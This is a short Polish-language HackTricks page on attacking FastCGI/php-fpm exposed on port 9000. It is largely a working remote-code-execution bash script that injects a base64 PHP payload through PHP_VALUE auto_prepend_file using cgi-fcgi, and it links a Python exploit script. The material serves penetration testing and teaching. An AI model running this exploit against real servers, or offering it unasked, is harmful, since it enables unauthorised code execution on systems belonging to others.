9000 - Pentesting FastCGI

Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks:

Podstawowe informacje

Jeśli chcesz dowiedzieć się, czym jest FastCGI, sprawdź następującą stronę:

pagedisable_functions bypass - php-fpm/FastCGI

Domyślnie FastCGI działa na porcie 9000 i nie jest rozpoznawany przez nmap. Zazwyczaj FastCGI słucha tylko na localhost.

RCE

Jest dość łatwo spowodować wykonanie dowolnego kodu przez FastCGI:

#!/bin/bash

PAYLOAD="<?php echo '<!--'; system('whoami'); echo '-->';"
FILENAMES="/var/www/public/index.php" # Exisiting file path

HOST=$1
B64=$(echo "$PAYLOAD"|base64)

for FN in $FILENAMES; do
OUTPUT=$(mktemp)
env -i \
PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT

cat $OUTPUT
done

lub możesz również użyć następującego skryptu python: https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75

Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks:

Last updated